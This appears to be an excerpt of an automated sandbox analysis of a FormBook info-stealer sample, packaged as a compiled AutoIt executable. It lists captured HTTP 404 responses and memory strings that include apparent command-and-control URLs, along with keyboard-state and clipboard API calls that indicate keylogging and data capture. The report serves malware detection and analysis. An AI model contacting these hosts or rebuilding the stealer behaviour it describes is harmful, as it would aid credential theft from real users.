Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Sat, 11 Jan 2025 00:40:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 2024950038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=7VBI_xSSfsUkn3GJ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:56 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:56 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Connection: closeDate: Sat, 11 Jan 2025 00:40:56 GMTContent-Length: 910X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-Download-Options: noopenX-XSS-Protection: 1; mode=blockCache-Flow: 2583346554Origin-Agent-Cluster: ?0FAI-W-FLOW: 2025038038FAI-W-AGENT-AID: 32663896Service-Lane: e8594f12d42b28ee5775cc58b9d2e933P3P: CP=CAO PSA OURX-Permitted-Cross-Domain-Policies: noneServer: F-WEBData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 20 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 22 3e 34 30 34 3a 20 e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 e3 80 82 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 42 75 74 74 6f 6e 22 3e 0a 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 27 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" hr
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:04 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:41:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: mobsync.exe, 00000005.00000002.3897126671.0000000005896000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002C76000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a
Source: mobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW
Source: mobsync.exe, 00000005.00000002.3897126671.0000000005704000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002E024000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002E08000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwR
Source: ldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop
Source: ldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zkdamdjj.shop/kf1m/
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000003450000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033S
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033a
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mobsync.exe, 00000005.00000003.2491113129.00000000080AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00704164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00704164

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00704164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00704164

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00703F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00703F66

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_006F001C

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_0071CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0071CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00693B3A
Source: tfWjjV1LdT.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: tfWjjV1LdT.exe, 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6942c1c0-c
